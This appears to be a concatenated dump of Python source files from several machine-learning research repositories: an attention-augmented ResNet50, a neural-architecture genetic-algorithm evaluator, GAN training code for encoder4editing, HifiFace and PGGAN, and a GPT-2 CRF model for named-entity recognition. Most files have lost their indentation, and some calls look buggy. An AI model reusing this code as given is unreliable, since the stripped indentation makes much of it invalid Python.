        local_feature = reduce(local_feature, 'b c h w h1 w1 -> b c h w', reduction='mean')
        h = local_feature.shape[2]
        local_feature = rearrange(local_feature, 'b c h w -> b (h w) c')  # (b p c)
        mix_local_global = torch.cat([local_feature, global_feature], 1)  # (b p+1 c)
        mix_local_global = self.linear1(mix_local_global)
        mix_local_global = self.relu(mix_local_global)
        mix_local_global = self.linear2(mix_local_global)
        mix_local_global = self.relu(mix_local_global)
        local_feature, global_feature = torch.split(mix_local_global, [local_feature.shape[1], global_feature.shape[1]], 1)  # (b p c), (b 1 c)
        global_feature = rearrange(global_feature, 'b p c -> b c p')  # (b c 1)
        # attention weights over the patches from the local/global interaction
        attention = torch.matmul(local_feature, global_feature)  # (b p 1)
        attention = reduce(attention, 'b p c -> b p', reduction='mean')  # c=1
        attention = self.softmax(attention)
        attention = rearrange(attention, 'b (h w) -> b 1 h w', h=h)  # c=1
        attention = rearrange(attention, 'b c h w -> b c h w 1 1')
        input_ = input_ * attention
        input_ = rearrange(input_, 'b c h w h1 w1 -> b c (h h1) (w w1)')
        input = input + input_  # shortcut
        return input

    def forward(self, x: Tensor) -> Tensor:
        return self.Attention(x)
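

if __name__ == "__main__":
    # Editorial usage sketch (not part of the original repository): the spatial
    # size must be divisible by patch_size; the module preserves the input shape.
    module = conam(patch_size=4, inchannel=64)
    x = torch.randn(2, 64, 16, 16)
    print(module(x).shape)  # expected: torch.Size([2, 64, 16, 16])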
```
#### File: ConAM/models/resnet50.py
```python
import torch.nn as nn
from torch import Tensor
import torch
from typing import List, Optional, Type, Union, Callable, Any
import sys
sys.path.append('/data/zmyuan/ResNet50-10')
from ConAM import conam
def conv3x3(in_planes: int, out_planes: int, stride: int = 1, groups: int = 1, dilation: int = 1) -> nn.Conv2d:
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=dilation, groups=groups, bias=False, dilation=dilation)
def conv1x1(in_planes: int, out_planes: int, stride: int = 1) -> nn.Conv2d:
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion: int = 1
def __init__(
self,
inplanes: int,
planes: int,
patch_size: int = 0,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(BasicBlock, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
if groups != 1 or base_width != 64:
raise ValueError('BasicBlock only supports groups=1 and base_width=64')
if dilation > 1:
raise NotImplementedError("Dilation > 1 not supported in BasicBlock")
self.patch_size = patch_size
if patch_size != 0:
self.attention = conam(patch_size=patch_size, inchannel=inplanes)
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = norm_layer(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = norm_layer(planes)
self.downsample = downsample
def forward(self, x: Tensor) -> Tensor:
identity = x
if self.patch_size != 0:
x = self.attention(x)
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
identity = self.downsample(identity)
out += identity
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion: int = 4
def __init__(
self,
inplanes: int,
planes: int,
patch_size: int = 0,
stride: int = 1,
downsample: Optional[nn.Module] = None,
groups: int = 1,
base_width: int = 64,
dilation: int = 1,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(Bottleneck, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
width = int(planes * (base_width / 64.)) * groups
self.patch_size = patch_size
if patch_size != 0:
self.attention = conam(patch_size=patch_size, inchannel=inplanes)
self.conv1 = conv1x1(inplanes, width)
self.bn1 = norm_layer(width)
self.conv2 = conv3x3(width, width, stride, groups, dilation)
self.bn2 = norm_layer(width)
self.conv3 = conv1x1(width, planes * self.expansion)
self.bn3 = norm_layer(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x: Tensor) -> Tensor:
identity = x
if self.patch_size != 0:
x = self.attention(x)
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
identity = self.downsample(identity)
out += identity
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(
self,
block: Type[Union[Bottleneck, BasicBlock]],
layers: List[int],
patch_sizes: List[int],
num_classes: int = 10,
zero_init_residual: bool = False,
groups: int = 1,
width_per_group: int = 64,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.dilation = 1
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=1, padding=1,
bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.layer1 = self._make_layer(block, 64, layers[0], patch_sizes[0])
self.layer2 = self._make_layer(block, 128, layers[1], patch_sizes[1], stride=2,)
self.layer3 = self._make_layer(block, 256, layers[2], patch_sizes[2], stride=2,)
self.layer4 = self._make_layer(block, 512, layers[3], patch_sizes[3], stride=2,)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
        if zero_init_residual:
            # zero-init the last BN of each residual branch (as in the original ResNet
            # recipe); skip all other modules instead of raising on them.
            for m in self.modules():
                if isinstance(m, Bottleneck):
                    nn.init.constant_(m.bn3.weight, 0)  # type: ignore[arg-type]
                elif isinstance(m, BasicBlock):
                    nn.init.constant_(m.bn2.weight, 0)  # type: ignore[arg-type]
def _make_layer(self, block: Type[Union[Bottleneck, BasicBlock]], planes: int, blocks: int, patch_size: int,
stride: int = 1,) -> nn.Sequential:
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, patch_size, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def _forward_impl(self, x: Tensor) -> Tensor:
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.fc(x)
return x
def forward(self, x: Tensor) -> Tensor:
return self._forward_impl(x)
def resnet50(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
layer = [3, 4, 6, 3]
patch_size = [8, 8, 4, 0] # the patch_size can be [8, 8, 4, 0], [8, 4, 2, 0], etc..
return ResNet(Bottleneck, layer, patch_size)
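

if __name__ == "__main__":
    # Editorial usage sketch (not part of the original repository): the stem is a
    # 3x3/stride-1 convolution without max-pooling, so CIFAR-sized 32x32 RGB inputs
    # are assumed here; the patch sizes [8, 8, 4, 0] then divide the feature maps
    # evenly, and the default head has 10 classes.
    model = resnet50()
    dummy = torch.randn(2, 3, 32, 32)
    print(model(dummy).shape)  # expected: torch.Size([2, 10])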
``` |
{
"source": "1ZimingYuan/Sleep",
"score": 3
} |
#### File: Sleep/Genetic_Algorithm/Evaluation.py
```python
from utils import Utils, GPUTools
import importlib
from multiprocessing import Process
import time, os, sys
from asyncio.tasks import sleep
class FitnessEvaluate(object):
def __init__(self, individuals, log):
self.individuals = individuals
self.log = log
def generate_to_python_file(self):
self.log.info('Begin to generate python files')
for indi in self.individuals:
Utils.generate_pytorch_file(indi)
self.log.info('Finish the generation of python files')
def evaluate(self):
"""
load fitness from cache file
"""
self.log.info('Query fitness from cache')
_map = Utils.load_cache_data()
_count = 0
for indi in self.individuals:
_key, _str = indi.uuid()
if _key in _map:
_count += 1
_acc = _map[_key]
self.log.info('Hit the cache for %s, key:%s, acc:%.5f, assigned_acc:%.5f'%(indi.id, _key, float(_acc), indi.acc))
indi.acc = float(_acc)
self.log.info('Total hit %d individuals for fitness'%(_count))
has_evaluated_offspring = False
for indi in self.individuals:
temp=1
if indi.acc < 0:
has_evaluated_offspring = True
time.sleep(60)
gpu_id = GPUTools.detect_availabel_gpu_id()
while gpu_id is None:
time.sleep(300)
if temp==1:
self.log.info('Waiting for free GPU...')
temp=2
gpu_id = GPUTools.detect_availabel_gpu_id()
if gpu_id is not None:
file_name = indi.id
self.log.info('Begin to train %s'%(file_name))
module_name = 'scripts.%s'%(file_name)
if module_name in sys.modules.keys():
self.log.info('Module:%s has been loaded, delete it'%(module_name))
del sys.modules[module_name]
_module = importlib.import_module('.', module_name)
else:
_module = importlib.import_module('.', module_name)
_class = getattr(_module, 'RunModel')
cls_obj = _class()
p=Process(target=cls_obj.do_work, args=('%d'%(gpu_id), file_name,))
p.start()
else:
file_name = indi.id
self.log.info('%s has inherited the fitness as %.5f, no need to evaluate'%(file_name, indi.acc))
f = open('./populations/after_%s.txt'%(file_name[4:6]), 'a+')
f.write('%s=%.5f\n'%(file_name, indi.acc))
f.flush()
f.close()
if has_evaluated_offspring:
all_finished = False
while all_finished is not True:
time.sleep(300)
all_finished = GPUTools.all_gpu_available()
if has_evaluated_offspring:
file_name = './populations/after_%s.txt'%(self.individuals[0].id[4:6])
assert os.path.exists(file_name) == True
f = open(file_name, 'r')
fitness_map = {}
for line in f:
if len(line.strip()) > 0:
line = line.strip().split('=')
fitness_map[line[0]] = float(line[1])
f.close()
for indi in self.individuals:
if indi.acc == -1:
if indi.id not in fitness_map:
self.log.warn('The individuals have been evaluated, but the records are not correct, the fitness of %s does not exist in %s, wait 120 seconds'%(indi.id, file_name))
sleep(120)
indi.acc = fitness_map[indi.id]
else:
self.log.info('None offspring has been evaluated')
Utils.save_fitness_to_cache(self.individuals)
``` |
{
"source": "1zong2/INVZ-encoder4editing",
"score": 2
} |
#### File: INVZ-encoder4editing/encoder4editing/model.py
```python
import torch
from lib import utils
from lib.model_interface import ModelInterface
from encoder4editing.loss import Encoder4EditingLoss
from encoder4editing.nets import Encoder4EditingGenerator
from submodel.discriminator import LatentCodesDiscriminator # with BCE
class Encoder4Editing(ModelInterface):
def initialize_models(self):
self.G = Encoder4EditingGenerator(arcface_path=self.args.arcface_path, batch_per_gpu=self.args.batch_per_gpu, stylegan_path=self.args.stylegan_path, stylegan_size=self.args.stylegan_size).cuda(self.gpu).train()
self.D = LatentCodesDiscriminator().cuda(self.gpu).train()
def set_loss_collector(self):
self._loss_collector = Encoder4EditingLoss(self.args)
def train_step(self, global_step):
# load batch
I_source = self.load_next_batch()
self.dict = {
"I_source": I_source,
}
# run G
self.run_G()
# update G
loss_G = self.loss_collector.get_loss_G(self.dict)
utils.update_net(self.opt_G, loss_G)
# run D
self.run_D()
# update D
loss_D = self.loss_collector.get_loss_D(self.dict)
utils.update_net(self.opt_D, loss_D)
return [self.dict["I_source"], self.dict["I_recon"]]
def run_G(self):
I_recon, w_fake = self.G(self.dict["I_source"])
d_adv = self.D(w_fake)
id_source = self.G.get_id(self.dict["I_source"])
id_recon = self.G.get_id(I_recon)
self.dict["I_recon"] = I_recon
self.dict["w_fake"] = w_fake
self.dict["d_adv"] = d_adv
self.dict["id_source"] = id_source
self.dict["id_recon"] = id_recon
def run_D(self):
self.dict["w_real"] = self.G.get_w_from_random_z()
self.dict["w_real"].requires_grad_()
d_real = self.D(self.dict["w_real"])
d_fake = self.D(self.dict["w_fake"].detach())
self.dict["d_real"] = d_real # [8, 16, 1]
self.dict["d_fake"] = d_fake
def validation(self, step):
with torch.no_grad():
Y = self.G(self.valid_source)[0]
utils.save_image(self.args, step, "valid_imgs", [self.valid_source, Y])
def save_image(self, result, step):
utils.save_image(self.args, step, "imgs", result)
@property
def loss_collector(self):
return self._loss_collector
``` |
{
"source": "1zong2/INVZ-hififace",
"score": 2
} |
#### File: INVZ-hififace/hififace/loss.py
```python
import torch
from lib.loss import Loss, LossInterface
class HifiFaceLoss(LossInterface):
def __init__(self, args):
super().__init__(args)
self.face_pool = torch.nn.AdaptiveAvgPool2d((64, 64)).to("cuda").eval()
def get_loss_G(self, G_dict):
L_G = 0.0
# Adversarial loss
if self.args.W_adv:
L_adv = Loss.get_BCE_loss(G_dict["d_adv"], True)
L_G += self.args.W_adv * L_adv
self.loss_dict["L_adv"] = round(L_adv.item(), 4)
# Shape loss
if self.args.W_shape:
L_shape = Loss.get_L1_loss(G_dict["q_fuse"], G_dict["q_swapped_high"])
L_shape += Loss.get_L1_loss(G_dict["q_fuse"], G_dict["q_swapped_low"])
L_G += self.args.W_shape * L_shape/68
self.loss_dict["L_shape"] = round(L_shape.item(), 4)
# Id loss
if self.args.W_id:
L_id = Loss.get_id_loss(G_dict["id_source"], G_dict["id_swapped_high"])
L_id += Loss.get_id_loss(G_dict["id_source"], G_dict["id_swapped_low"])
L_G += self.args.W_id * L_id
self.loss_dict["L_id"] = round(L_id.item(), 4)
# Reconstruction loss
if self.args.W_recon:
L_recon = Loss.get_L1_loss_with_same_person(G_dict["I_swapped_high"], G_dict["I_target"], G_dict["same_person"], self.args.batch_per_gpu)
L_recon += Loss.get_L1_loss_with_same_person(G_dict["I_swapped_low"], G_dict["I_target"], G_dict["same_person"], self.args.batch_per_gpu)
L_G += self.args.W_recon * L_recon
self.loss_dict["L_recon"] = round(L_recon.item(), 4)
# Cycle loss
if self.args.W_cycle:
L_cycle = Loss.get_L1_loss(G_dict["I_target"], G_dict["I_cycle"])
L_G += self.args.W_cycle * L_cycle
self.loss_dict["L_cycle"] = round(L_cycle.item(), 4)
# LPIPS loss
if self.args.W_lpips:
# L_lpips = Loss.get_lpips_loss(G_dict["I_cycle"], G_dict["I_target"])
L_lpips = Loss.get_lpips_loss(G_dict["I_swapped_high"], G_dict["I_target"])
L_lpips += Loss.get_lpips_loss(G_dict["I_swapped_low"], G_dict["I_target"])
L_G += self.args.W_lpips * L_lpips
self.loss_dict["L_lpips"] = round(L_lpips.item(), 4)
self.loss_dict["L_G"] = round(L_G.item(), 4)
return L_G
def get_loss_D(self, D_dict):
L_true = Loss.get_BCE_loss(D_dict["d_true"], True)
L_fake = Loss.get_BCE_loss(D_dict["d_fake"], False)
L_reg = Loss.get_r1_reg(D_dict["d_true"], D_dict["I_target"])
L_D = L_true + L_fake + L_reg
self.loss_dict["L_D"] = round(L_D.item(), 4)
self.loss_dict["L_true"] = round(L_true.mean().item(), 4)
self.loss_dict["L_fake"] = round(L_fake.mean().item(), 4)
return L_D
``` |
{
"source": "1zong2/pggan",
"score": 2
} |
#### File: pggan/pggan/loss.py
```python
import torch
from lib.loss import Loss, LossInterface
class WGANGPLoss(LossInterface):
def get_loss_G(self, G_dict):
L_G = 0.0
# Adversarial loss
if self.args.W_adv:
L_adv = Loss.get_BCE_loss(G_dict["pred_fake"], True)
L_G += self.args.W_adv * L_adv
self.loss_dict["L_G"] = round(L_G.item(), 4)
return L_G
def get_loss_D(self, D_dict):
# Real
L_D_real = Loss.get_BCE_loss(D_dict["pred_real"], True)
L_D_fake = Loss.get_BCE_loss(D_dict["pred_fake"], False)
L_reg = Loss.get_r1_reg(L_D_real, D_dict["img_real"])
L_D = L_D_real + L_D_fake + L_reg
self.loss_dict["L_D_real"] = round(L_D_real.mean().item(), 4)
self.loss_dict["L_D_fake"] = round(L_D_fake.mean().item(), 4)
self.loss_dict["L_D"] = round(L_D.item(), 4)
return L_D
# def get_loss_D(self, D_dict, discriminator):
# """
    #     WGAN-GP updates the Discriminator twice:
    #     (once inside get_gradient_penalty, and once again when model.D is updated with L_D)
# """
# L_D_real = Loss.get_BCE_loss(D_dict["pred_real"], True)
# L_D_fake = Loss.get_BCE_loss(D_dict["pred_fake"], False)
# L_D = L_D_real + L_D_fake
# # WGAN-GP gradient loss
# L_D_gp = self.get_gradient_penalty(D_dict, discriminator)
# # Drift loss (the fourth term)
# L_D_eps = self.get_drift_loss(D_dict)
# self.loss_dict["L_D_real"] = round(L_D_real.mean().item(), 4)
# self.loss_dict["L_D_fake"] = round(L_D_fake.mean().item(), 4)
# self.loss_dict["L_D_gp"] = round(L_D_gp, 4)
# self.loss_dict["L_D_eps"] = round(L_D_eps, 4)
# self.loss_dict["L_D"] = round(L_D.item() + L_D_gp + L_D_eps, 4)
# return L_D
def get_gradient_penalty(self, D_dict, discriminator, backward=True):
r"""
Gradient penalty as described in
"Improved Training of Wasserstein GANs"
https://arxiv.org/pdf/1704.00028.pdf
Args:
- input (Tensor): batch of real data
- fake (Tensor): batch of generated data. Must have the same size
as the input
        - discriminator (nn.Module): discriminator network
- weight (float): weight to apply to the penalty term
- backward (bool): loss backpropagation
"""
if self.args.W_gp:
batchSize = D_dict["img_real"].size(0)
eps = torch.rand(batchSize, 1)
eps = eps.expand(batchSize, int(D_dict["img_real"].nelement()/batchSize)).contiguous().view(D_dict["img_real"].size())
eps = eps.to(D_dict["img_real"].get_device())
interpolates = eps * D_dict["img_real"] + ((1 - eps) * D_dict["img_fake"])
            interpolates = torch.autograd.Variable(interpolates, requires_grad=True)  # keep the graph so gradients w.r.t. the interpolates can be taken
decisionInterpolate = discriminator(interpolates)
decisionInterpolate = decisionInterpolate[:, 0].sum()
gradients = torch.autograd.grad(outputs=decisionInterpolate,
inputs=interpolates,
create_graph=True, retain_graph=True)
gradients = gradients[0].view(batchSize, -1)
gradients = (gradients * gradients).sum(dim=1).sqrt()
gradient_penalty = (((gradients - 1.0)**2)).sum() * self.args.W_gp
if backward:
gradient_penalty.backward(retain_graph=True)
return gradient_penalty.item()
def get_drift_loss(self, D_dict):
"""
Loss for keeping D output from drifting too far away from 0
"""
if self.args.W_drift_D:
drift = (D_dict["pred_real"] ** 2).sum() * self.args.W_drift_D
return drift.item()
```
#### File: pggan/pggan/model.py
```python
import torch
import torch.nn.functional as F
from lib import checkpoint, utils
from lib.model import ModelInterface
from lib.dataset import UnsupervisedDataset
from pggan.nets import Generator, Discriminator
from pggan.loss import WGANGPLoss
class ProgressiveGAN(ModelInterface):
def __init__(self, args, gpu):
self.scale_index = 0
self.downsample = torch.nn.AvgPool2d(3, stride=2, padding=[1, 1], count_include_pad=False)
super().__init__(args, gpu)
def initialize_models(self):
self.initialize_generator()
self.initialize_discriminator()
self.G.train()
self.D.train()
def initialize_generator(self):
self.G = Generator(self.args.latent_dim,
self.args.depths[0],
self.args.init_bias_to_zero,
self.args.LReLU_slope,
self.args.apply_pixel_norm,
self.args.generator_last_activation,
self.args.output_dim,
self.args.equalized_lr)
self.G.cuda(self.gpu)
def initialize_discriminator(self):
self.D = Discriminator(self.args.depths[0],
self.args.init_bias_to_zero,
self.args.LReLU_slope,
self.args.decision_layer_size,
self.args.apply_minibatch_norm,
self.args.input_dim, # input_dim output_dim
self.args.equalized_lr)
self.D.cuda(self.gpu)
# Override
def save_checkpoint(self, global_step):
"""
Save model and optimizer parameters.
"""
ckpt_dict = {
"args": self.args.__dict__,
"global_step": global_step,
"alpha_G": self.G.alpha,
"alpha_D": self.D.alpha,
"alpha_index": self.alpha_index,
"alpha_jump_value": self.alpha_jump_value,
"next_alpha_jump_step": self.next_alpha_jump_step,
"scale_index": self.scale_index,
"next_scale_jump_step": self.next_scale_jump_step,
}
checkpoint.save_checkpoint(self.G, self.opt_G, name='G', ckpt_dict=ckpt_dict)
checkpoint.save_checkpoint(self.D, self.opt_D, name='D', ckpt_dict=ckpt_dict)
# Override
def load_checkpoint(self):
"""
Load pretrained parameters from checkpoint to the initialized models.
"""
G_ckpt_dict, D_ckpt_dict = \
checkpoint.load_checkpoint(self.args, name='G'), \
checkpoint.load_checkpoint(self.args, name='D')
self.args.update(G_ckpt_dict["args"])
self.global_step = G_ckpt_dict["global_step"]
self.G.alpha = G_ckpt_dict["alpha_G"]
self.D.alpha = G_ckpt_dict["alpha_D"]
self.alpha_index = G_ckpt_dict["alpha_index"]
self.alpha_jump_value = G_ckpt_dict["alpha_jump_value"]
self.next_alpha_jump_step = G_ckpt_dict["next_alpha_jump_step"]
self.scale_index = G_ckpt_dict["scale_index"]
self.next_scale_jump_step = G_ckpt_dict["next_scale_jump_step"]
for index in range(self.scale_index):
self.G.add_block(self.args.depths[index])
self.D.add_block(self.args.depths[index])
self.G.cuda()
self.D.cuda()
self.reset_solver()
self.G.load_state_dict(G_ckpt_dict['model'], strict=False)
self.opt_G.load_state_dict(G_ckpt_dict['optimizer'])
self.D.load_state_dict(D_ckpt_dict['model'], strict=False)
self.opt_D.load_state_dict(D_ckpt_dict['optimizer'])
# Override
def load_next_batch(self):
"""
Load next batch of source image, target image, and boolean values that denote
if source and target are identical.
"""
try:
batch = next(self.train_iterator)
except StopIteration:
self.train_iterator = iter(self.train_dataloader)
batch = next(self.train_iterator)
batch = batch.to(self.gpu)
return batch
# Override
def set_dataset(self):
"""
Initialize dataset using the dataset paths specified in the command line arguments.
CelebA: 202,599 face images of the size 178×218 from 10,177 celebrities
"""
dataset = UnsupervisedDataset(self.args.dataset_root_list, self.scale_index, self.args.isMaster)
N = len(dataset)
N_train = round(N * 0.7)
self.train_dataset, self.valid_dataset = torch.utils.data.random_split(dataset, [N_train, N - N_train])
def set_loss_collector(self):
self._loss_collector = WGANGPLoss(self.args)
def reset_solver(self):
"""
Reset data loaders corresponding to the output image size,
and reset optimizers as the number of learnable parameters are changed.
This method is required only when the Generator and the Discriminator add a new block.
"""
self.set_dataset()
self.set_data_iterator()
self.set_optimizers()
def reset_alpha(self, global_step):
"""
Initialize alpha-related-variables
This method is required only when the Generator and the Discriminator add a new block.
"""
self.G.alpha = 0
self.D.alpha = 0
self.alpha_index = 0
self.next_alpha_jump_step = global_step + self.args.alpha_jump_start[self.scale_index]
self.alpha_jump_value = 1/self.args.alpha_jump_Ntimes[self.scale_index]
if self.args.isMaster:
print(f"alpha and alpha_index are initialized to 0")
print(f"next_alpha_jump_step is set to {self.next_alpha_jump_step}")
print(f"alpha_jump_value is set to {self.alpha_jump_value}")
def change_scale(self, global_step):
self.scale_index += 1
self.next_scale_jump_step += self.args.max_step_at_scale[self.scale_index]
# add a block to net G and net D
self.G.add_block(self.args.depths[self.scale_index])
self.D.add_block(self.args.depths[self.scale_index])
self.G.cuda()
self.D.cuda()
self.reset_solver()
self.reset_alpha(global_step)
if self.args.isMaster:
print(f"\nNOW global_step is {global_step}")
print(f"scale_index is updated to {self.scale_index}")
print(f"next_scale_jump_step is {self.next_scale_jump_step}")
def change_alpha(self, global_step):
self.alpha_index += 1
self.G.alpha += self.alpha_jump_value
self.D.alpha += self.alpha_jump_value
self.G.alpha = round(self.G.alpha, 4)
self.D.alpha = round(self.D.alpha, 4)
# check if alpha_index is reached to alpha_jump_Ntimes
if self.alpha_index == self.args.alpha_jump_Ntimes[self.scale_index]:
self.next_alpha_jump_step = 0
else:
self.next_alpha_jump_step = global_step + self.args.alpha_jump_interval[self.scale_index]
if self.args.isMaster:
print(f"\nNOW global_step is {global_step}")
print(f"alpha_index is updated to {self.alpha_index}")
print(f"next_alpha_jump_step is {self.next_alpha_jump_step}")
print(f"alpha is now {self.G.alpha}")
def check_jump(self, global_step):
        # when the scale changes (time to add a new block)
if self.next_scale_jump_step == global_step:
self.change_scale(global_step)
        # when alpha changes (linear schedule)
if self.next_alpha_jump_step == global_step:
self.change_alpha(global_step)
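    # Editorial walk-through (hypothetical config values): if max_step_at_scale[1] were
    # 10000, change_scale would fire 10000 steps after the previous scale jump; at that
    # point a new block is added, alpha is reset to 0, and alpha is then increased by
    # 1/alpha_jump_Ntimes[scale] every alpha_jump_interval[scale] steps until it reaches 1,
    # fading the new high-resolution block in smoothly.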
def train_step(self):
"""
Corresponds to optimizeParameters from pytorch_GAN_zoo/models/base_GAN.py
"""
img_real = self.load_next_batch()
n_samples = len(img_real)
###########
# Train D #
###########
if self.scale_index:
low_img_real = F.avg_pool2d(img_real, (2, 2))
            low_img_real = F.interpolate(low_img_real, scale_factor=2, mode='nearest')  # F.upsample is deprecated in favor of F.interpolate
img_real = (1-self.D.alpha) * low_img_real + self.D.alpha * img_real
img_real.requires_grad_()
pred_real = self.D(img_real)
latent_input = torch.randn(n_samples, self.args.latent_dim).to(self.gpu)
img_fake = self.G(latent_input).detach()
pred_fake = self.D(img_fake)
D_dict = {
"img_real": img_real,
"img_fake": img_fake,
"pred_real": pred_real,
"pred_fake": pred_fake,
}
loss_D = self.loss_collector.get_loss_D(D_dict)
utils.update_net(self.opt_D, loss_D)
###########
# Train G #
###########
latent_input = torch.randn(n_samples, self.args.latent_dim).to(self.gpu)
img_fake = self.G(latent_input)
pred_fake, _ = self.D(img_fake, True)
G_dict = {
"pred_fake": pred_fake,
}
loss_G = self.loss_collector.get_loss_G(G_dict)
utils.update_net(self.opt_G, loss_G)
return [img_real, img_fake]
def save_image(self, images, step):
utils.save_image(self.args, step, "imgs", images)
def validation(self):
pass
@property
def loss_collector(self):
return self._loss_collector
``` |
{
"source": "20000607-lxc/BERT-NER-Pytorch-master",
"score": 2
} |
#### File: BERT-NER-Pytorch-master/models/gpt_crf_for_ner.py
```python
import torch
import torch.nn as nn
from .layers.crf import CRF
from .transformers_master.models.gpt2.modeling_gpt2 import GPT2Model as New_GPT2
from models.p_tuning.prompt_encoder import PromptEncoder
from torch.nn.utils.rnn import pad_sequence
from transformers import GPT2LMHeadModel
from .layers.model.lstmcrf import NNCRF
class GPT2CrfForNer(torch.nn.Module):
"""
输出input[1:] + prompt3 对应的hidden state
tokenizer: bert-base-chinese or gpt2 tokenizer
"""
def __init__(self, config, device, template, model_name=None):
super().__init__()
self.num_labels = config.num_labels
self.device = device
if model_name == None:
model_name = 'gpt2'
self.LMgpt2 = GPT2LMHeadModel.from_pretrained(model_name).to(self.device)
        self.gpt2 = self.LMgpt2.base_model  # New_GPT2.from_pretrained(model_name).to(self.device)  # accepts both inputs_embeds and input_ids
        self.embeddings = self.gpt2.get_input_embeddings().to(device)  # the embedding layer of GPT2LMHeadModel
self.dropout = nn.Dropout(config.resid_pdrop).to(self.device)
self.classifier = nn.Linear(config.hidden_size, config.num_labels).to(self.device)
self.loss_type = 'ce'
self.crf = CRF(num_tags=config.num_labels, batch_first=True).to(self.device)
self.lstmcrf = NNCRF(config=config, device=device, num_tags=config.num_labels, batch_first=True).to(self.device)
        self.pseudo_token_id = 50257  # id of the <PASSWORD> word (pseudo prompt token)
self.hidden_size = self.embeddings.embedding_dim
self.template = template
self.pad_token_id = 0
self.spell_length = sum(self.template)
self.prompt_encoder = PromptEncoder(self.template, self.hidden_size, device)
self.prompt_encoder = self.prompt_encoder.to(device)
self.lstm = torch.nn.LSTM(input_size=self.hidden_size,
hidden_size=self.hidden_size // 2,
num_layers=2,
dropout=0.0,
bidirectional=True,
batch_first=True).to(self.device)
print("init GPT2CrfForNer ")
def get_query(self, input_id, prompt_tokens, Bi_lstm=False, lstm=False):
# reversed = False
# if reversed:
# reversed_sequence = [input_id[len(input_id)-1-i] for i in range(len(input_id))]
# return [prompt_tokens * self.template[0] +
# reversed_sequence +
# prompt_tokens * self.template[1] +
# [input_id[i] for i in range(len(input_id))]
# ]
# elif Bi_lstm:
# return [ prompt_tokens * self.template[0]
# + prompt_tokens * len(input_id)
# + prompt_tokens * self.template[1]
# + [input_id[i] for i in range(len(input_id))]
# ]
# elif lstm:
# return [ prompt_tokens * self.template[0]
# + [input_id[i] for i in range(len(input_id))]
# + prompt_tokens * self.template[1]
# + [input_id[i] for i in range(len(input_id))]
# ]
# else:
input = []
prompt1 = []
prompt2 = []
prompt3 = []
count = 0
for i in range(self.template[0]):
prompt1.append(prompt_tokens[0])
for i in range(self.template[1]):
prompt2.append(prompt_tokens[0])
prompt3.append(prompt_tokens[0])
for i in range(len(input_id)):
if input_id[i] != 0:
count += 1
input.append(input_id[i].item())
if self.template[0] == self.template[1]:
            query = prompt1 + input + prompt2 + input  # + prompt3  # prompt3 is a single position
else:
query = prompt1 + input + prompt2 # + prompt3
return query, count
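    # Editorial example (hypothetical token ids): with template = (3, 3) and
    # input_id = [50, 60, 0, 0], get_query returns
    #   [p, p, p, 50, 60, p, p, p, 50, 60]   where p = self.pseudo_token_id,
    # together with count = 2 (the number of non-pad tokens).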
def embed_input(self, queries, input_embeds, Bi_lstm=False, lstm=False, counts=None):
"""
turn the queries(word index) :[batch_size,query_length]
into embeddings: [batch_size,query_length,768]
"""
bz = queries.shape[0]
queries_for_embedding = queries.clone()
queries_for_embedding[(queries == self.pseudo_token_id)] = self.pseudo_token_id-1
# if Bi_lstm:
# sequence_length = input_embeds.shape[1]
# raw_embeds = torch.zeros(queries.shape[0],queries.shape[1], 768)
# prompt_length =raw_embeds.shape[1]-sequence_length
# for j in range(bz):
# replace_embeds = self.prompt_encoder(raw_embeds[j, prompt_length:, :])
# raw_embeds[j] = self.embeddings(queries_for_embedding[j])
# block_length = prompt_length
# for i in range(block_length):
# raw_embeds[j, i:i+1, :] = replace_embeds[i, :]
# return raw_embeds
#
# elif lstm:
# replace_embeds = self.prompt_encoder()
# raw_embeds = self.embeddings(queries_for_embedding)
# input = copy.deepcopy(raw_embeds)
# l = len(queries[0])-(len(queries[0])-12)//2
